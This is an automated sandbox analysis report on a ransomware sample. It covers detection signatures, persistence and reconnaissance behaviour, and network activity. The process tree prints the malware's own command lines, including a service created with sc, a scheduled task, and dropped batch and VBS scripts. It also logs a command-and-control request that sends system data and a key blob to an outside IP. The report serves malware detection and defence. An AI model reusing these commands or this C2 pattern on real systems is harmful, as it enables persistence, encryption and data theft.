Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BiXS3FRoLe.exe

Overview

General Information

Sample name:BiXS3FRoLe.exe
renamed because original name is a hash value
Original sample name:1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84.exe
Analysis ID:1569984
MD5:8f807535948b5e93317baf48a4d0e69d
SHA1:9c3a19d95ebd7d43cc37437237fbc75ebd541bf0
SHA256:1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected TrojanRansom
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • BiXS3FRoLe.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\BiXS3FRoLe.exe" MD5: 8F807535948B5E93317BAF48A4D0E69D)
    • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 7472 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7480 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7884 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7932 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7964 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 8036 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7260 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7316 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7480 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7356 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7216 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2088 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5632 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7472 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7992 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8096 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7488 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7544 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3096 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 656 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 8092 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 8148 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 8164 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 6944 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 1732 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • svchost.exe (PID: 7516 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Sgrmuserer.exe (PID: 7552 cmdline: C:\Windows\system32\Sgrmuserer.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7588 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7616 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7724 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 8180 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5768 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 1636 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5900 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 6032 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: 8F807535948B5E93317BAF48A4D0E69D)
    • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: BiXS3FRoLe.exe PID: 7364JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security
    Process Memory Space: Xinfecter.exe PID: 8172JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious File Creation In Uncommon AppData Folder
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\BiXS3FRoLe.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\S-6748.bat
      Sigma detected: Suspicious New Service Creation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 7884, ProcessName: sc.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7996, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 8036, ProcessName: wscript.exe
      Sigma detected: Startup Folder File Write
      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\BiXS3FRoLe.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7996, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 8036, ProcessName: wscript.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 7884, ProcessName: sc.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7516, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-06T13:42:11.708896+010020458211Malware Command and Control Activity Detected192.168.2.1049715185.147.34.533586TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: BiXS3FRoLe.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeAvira: detection malicious, Label: HEUR/AGEN.1353205
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeReversingLabs: Detection: 84%
      Multi AV Scanner detection for submitted file
      Source: BiXS3FRoLe.exeReversingLabs: Detection: 84%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: BiXS3FRoLe.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,0_2_00AD4230
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD47F0 CryptReleaseContext,0_2_00AD47F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,0_2_00AD4900
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4390 CryptAcquireContextA,GetLastError,CryptReleaseContext,0_2_00AD4390
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4720 CryptReleaseContext,0_2_00AD4720
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4760 CryptGenRandom,__CxxThrowException@8,0_2_00AD4760
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,48_2_00074230
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000747F0 CryptReleaseContext,48_2_000747F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,48_2_00074900
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074390 CryptAcquireContextA,GetLastError,CryptReleaseContext,48_2_00074390
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074720 CryptReleaseContext,48_2_00074720
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074760 CryptGenRandom,__CxxThrowException@8,48_2_00074760
      Source: BiXS3FRoLe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: BiXS3FRoLe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: z:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: x:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: v:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: t:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: r:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: p:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: n:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: l:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: j:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: h:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: f:Jump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: d:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: b:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: y:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: w:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: u:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: s:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: q:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: o:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: m:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: k:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: i:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: g:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: e:Jump to behavior
      Source: C:\Windows\System32\cmd.exeFile opened: c:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile opened: a:Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A84500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,0_2_00A84500
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00024500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,48_2_00024500
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A88240 SetErrorMode,FindFirstFileW,0_2_00A88240
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A88380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_00A88380
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A89ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_00A89ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_00A8AF50
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B3BA6B FindFirstFileExA,0_2_00B3BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00028240 SetErrorMode,FindFirstFileW,48_2_00028240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00028380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,48_2_00028380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,48_2_0002AF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000DBA6B FindFirstFileExA,48_2_000DBA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00029ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,48_2_00029ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8D950 GetLogicalDriveStringsA,0_2_00A8D950

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.10:49715 -> 185.147.34.53:3586
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 3586
      Source: global trafficTCP traffic: 192.168.2.10:49715 -> 185.147.34.53:3586
      Source: global trafficHTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:42:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aq7AthsgOC4cJv42nbpH3UXKqgFnpfIF2Mh/P93OgZkF3JPD5MmtdEB9fVNMwZNaSO/3She5MBu7aPiTlTr2f0h8Tby5EoEg6fH+I199CVCljV+q3qJlndcf7Qc0kpc+2y3oLE5MQimq+Sf6T4Sf6STfXjIiYXs9UejSYERe9ho6EoO5vZ9lqVAIjxir0zzTwlMBuiCCOLQKgMSKNQAuM2fcGfrSqnnm3gPaoVOBR/PHwB6eAARud748ct0eiTO01y+AMJtI29FqtGk0+k/Hii9CWn8qrY6CUWFZABgf5KOmsSq6wR87WUdb+aznRnLauO9YOFUY6U4pOgX8eWhczQtRa9JO3ew5Zag/CvoIJ98OGRGpkFtn7SaCg4DfI5O/fr5qDCAYePnjRJhH45ZUkA6wwt2d1R88d4k1h4uWGqB7zXu8Q1AQw70gqz7qyIcIKHSsfZc3IDiOUZkQIITDLVehvE24+9mM4BAPGd1Fdx+R8CfTIgd5lo03LOE460v3eJ7x23hr4tJjerTwWk4kYVe1qeoAOzv9dl0GZgzIAjS0UYxunSSCfEOXvn3u7RtP7/F9bk50RTc7msTK7yw7sC8fcXypL3pxeW/AgERAoIBAEySUw5HjWknEMGnG1ixYvGcEz6KwSQgRXCK5xLzDXPTLBa/gI1SnNYuDVqidl7MR918bHVZp/6KYNyPbB4bMcMCP7GwX2m5bf0MJ+YE2tdGGxXybo9SmWaCv4A9khMIPpnhk3MzJg9bBzj17yChsdDynZzjrWzeqmnNm5MKJItU4DoROjGTGPgzLm8bzHSWqmKtKOsf8XySDxmJtlDdXt7NUj67TFGhe+XSImP3V0IMANR2p